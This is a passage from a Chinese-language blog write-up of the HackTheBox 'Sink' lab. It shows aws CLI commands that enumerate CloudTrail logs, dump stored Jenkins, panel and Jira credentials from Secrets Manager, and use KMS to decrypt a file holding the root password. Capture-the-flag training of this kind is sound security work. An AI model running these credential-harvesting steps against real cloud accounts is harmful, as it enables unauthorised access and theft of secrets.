<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs maxima">awslocal logs <span class="hljs-built_in">describe</span>-<span class="hljs-built_in">log</span>-groups<br></code></pre></td></tr></table></figure>

<p>可以找到一个<code>log-group</code></p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929163131899.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929163131899"></p>
<p>进一步通过该<code>log-group</code>，可以找到一个<code>log-stream</code></p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sqf">awslocal logs describe-<span class="hljs-built_in">log</span>-streams --<span class="hljs-built_in">log</span>-<span class="hljs-built_in">group</span>-<span class="hljs-built_in">name</span> cloudtrail<br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929164540284.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929164540284"></p>
<p>再进一步查看，得到一些有意思的事件名称：</p>
<figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dsconfig"><span class="hljs-string">awslocal</span> <span class="hljs-string">logs</span> <span class="hljs-built_in">get-log-events</span> <span class="hljs-built_in">--log-group-name</span> <span class="hljs-string">cloudtrail</span> <span class="hljs-built_in">--log-stream-name</span> <span class="hljs-string">20201222</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929164646600.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929164646600"></p>
<p>Google一下，可以发现和aws的<code>Secrets Manager</code>有关：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929164714439.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929164714439"></p>
<p>同时aws的cli也有该命令</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929164742776.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929164742776"></p>
<p>同样地，先看看有用的命令：</p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coq">awslocal secretsmanager help| <span class="hljs-type">grep</span> -E &#x27;list|<span class="hljs-type">get</span>|<span class="hljs-type">describe</span>&#x27;<br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929220908301.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929220908301"></p>
<p>然后使用之前泄露的<code>access_id</code>和<code>access_secret</code>进行配置：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929163728174.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929163728174"></p>
<p>配置之后尝试列出所有的secrets：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">awslocal secretsmanager list-secrets</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929165058613.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929165058613"></p>
<p>之后分别拿到secrets的value值：</p>
<figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs dsconfig"><span class="hljs-string">awslocal</span> <span class="hljs-string">secretsmanager</span> <span class="hljs-built_in">get-secret-value</span> <span class="hljs-built_in">--secret-id</span> <span class="hljs-string">&#x27;Jenkins Login&#x27;</span><br><span class="hljs-string">awslocal</span> <span class="hljs-string">secretsmanager</span> <span class="hljs-built_in">get-secret-value</span> <span class="hljs-built_in">--secret-id</span> <span class="hljs-string">&#x27;Sink Panel&#x27;</span><br><span class="hljs-string">awslocal</span> <span class="hljs-string">secretsmanager</span> <span class="hljs-built_in">get-secret-value</span> <span class="hljs-built_in">--secret-id</span> <span class="hljs-string">&#x27;Jira Support&#x27;</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929165327601.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929165327601"></p>
<p>对具有登录权限的用户进行查看，发现有root、marcus、david。刚好上面拿到的账号中也有一个david。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929165428416.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929165428416"></p>
<p>使用密码登录，拿到david的shell：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929223048356.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929223048356"></p>
<h2 id="0x04-提权至root"><a href="#0x04-提权至root" class="headerlink" title="0x04 提权至root"></a>0x04 提权至root</h2><p>在david家目录的某个文件夹底下能够发现一个<code>servers.enc</code>文件：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929223318515.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929223318515"></p>
<p>那就想着法子解密咯。回到之前的gitea，在Key_Management目录下能够发现有一个keys.php，可以看出它在与aws的kms服务进行交互：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210930112614166.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210930112614166"></p>
<p>Google一下，可以发现是aws的密钥管理服务，里面可能有我们想要的东西：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210930113055733.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210930113055733"></p>
<p>回到服务器，查看可用的命令：</p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coq">awslocal kms help| <span class="hljs-type">grep</span> -E &#x27;get|<span class="hljs-type">describe</span>|<span class="hljs-type">list</span>&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929191913606.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929191913606"></p>
<p>首先看下存在的密钥：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">awslocal kms list-keys</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210930113232328.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210930113232328"></p>
<p>先查看某一密钥的详细信息：</p>
<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs maxima">awslocal kms <span class="hljs-built_in">describe</span>-<span class="hljs-built_in">key</span> --<span class="hljs-built_in">key</span>-id <span class="hljs-number">0b539917</span>-5eff-<span class="hljs-number">45b2</span>-9fa1-e13f0d2c42ac<br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929192238621.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929192238621"></p>
<p>可以观察到有一<code>Keystate</code>字样，我们需要查找<code>Keystate</code>为<code>Enabled</code>的密钥。</p>
<p>写个简单的shell语句进行查找：</p>
<figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dsconfig"><span class="hljs-string">for</span> <span class="hljs-string">i</span> <span class="hljs-string">in</span> $(<span class="hljs-string">awslocal</span> <span class="hljs-string">kms</span> <span class="hljs-built_in">list-keys</span> | <span class="hljs-string">grep</span> <span class="hljs-string">KeyId</span> | <span class="hljs-string">awk</span> -<span class="hljs-string">F</span>\<span class="hljs-string">&quot; &#x27;&#123;print $4;&#125;&#x27;); do awslocal kms describe-key --key-id $i | grep -E &#x27;KeyId|Enabled&#x27; ; echo; done;</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929201726591.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929201726591"></p>
<p>对<code>State</code>为<code>Enabled</code>状态的key进行查看：</p>
<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs maxima">awslocal kms <span class="hljs-built_in">describe</span>-<span class="hljs-built_in">key</span> --<span class="hljs-built_in">key</span>-id 804125db-bdf1-465a-a058-<span class="hljs-number">07fc87c0fad0</span><br>awslocal kms <span class="hljs-built_in">describe</span>-<span class="hljs-built_in">key</span> --<span class="hljs-built_in">key</span>-id c5217c17-<span class="hljs-number">5675</span>-42f7-a6ec-b5aa9b9dbbde<br></code></pre></td></tr></table></figure>





<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929201930968.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929201930968"></p>
<p>我们使用第一个命令对得到的文件进行解密。首先使用<code>help</code>命令查看<code>decrypt</code>方法的使用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">aws kms decrypt <span class="hljs-built_in">help</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929202230740.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929202230740"></p>
<p>对着example构造我们的语句即可：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929202659887.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929202659887"></p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">awslocal kms decrypt <span class="hljs-params">--ciphertext-blob</span> fileb:<span class="hljs-string">//servers.enc</span> <span class="hljs-params">--key-id</span> 804125db-bdf1-465a-a058-07fc87c0fad0 <span class="hljs-params">--encryption-algorithm</span> RSAES_OAEP_SHA_256<br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929202747680.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929202747680"></p>
<p>将得到的<code>base64</code>语句解码放进文件里，并使用<code>file</code>命令查看文件类型：</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs applescript">echo &lt;base64code&gt; | base64 -d &gt; <span class="hljs-literal">result</span><br><span class="hljs-built_in">file</span> <span class="hljs-literal">result</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929202955087.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929202955087"></p>
<p>解压后继续查看文件类型：</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs applescript">mv <span class="hljs-literal">result</span> <span class="hljs-literal">result</span>.gz<br>gzip -d <span class="hljs-literal">result</span>.gz<br>ll<br><span class="hljs-built_in">file</span> <span class="hljs-literal">result</span><br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210930114528281.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210930114528281"></p>
<p>继续解压即可拿到密码：</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs applescript">mv <span class="hljs-literal">result</span> <span class="hljs-literal">result</span>.tar<br>tar -xvf <span class="hljs-literal">result</span><br>cat servers.yml<br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929203757742.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929203757742"></p>
<p>拿到此密码即可登录root用户：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210930114707304.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210930114707304"></p>

              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Web/" class="category-chain-item">Web</a>
  
  
    <span>></span>
    
  <a href="/categories/Web/%E9%9D%B6%E5%9C%BA/" class="category-chain-item">靶场</a>
  
  
    <span>></span>
    
  <a href="/categories/Web/%E9%9D%B6%E5%9C%BA/HackTheBox/" class="category-chain-item">HackTheBox</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/HackTheBox/">#HackTheBox</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>HackTheBox - Sink</div>
      <div>https://m0ck1ng-b1rd.github.io/2021/12/07/HTB/Sink/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>何语灵</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2021年12月7日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/12/07/HTB/Schooled/" title="HackTheBox - Schooled">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HackTheBox - Schooled</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/12/07/HTB/Spider/" title="HackTheBox - Spider">
                        <span class="hidden-mobile">HackTheBox - Spider</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'M0cK1nG-b1Rd/blog-comments');
      s.setAttribute('issue-term', 'title');
      
      s.setAttribute('label', 'utterances');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://M0cK1nG-b1Rd.github.io" target="_blank" rel="nofollow noopener"><span>M0cK1nG-b1Rd</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Powered by Hexo&Fluid</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  

  

  

  

  

  

  
    
  




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.0/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>




  
<script src="//picbedddd.oss-cn-beijing.aliyuncs.com/blog/scripts/DynamicRibbon.min.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"left","width":250,"height":500,"hOffset":-30,"vOffset":-150},"mobile":{"show":true,"scale":0.5},"log":false});</script></body>
</html>
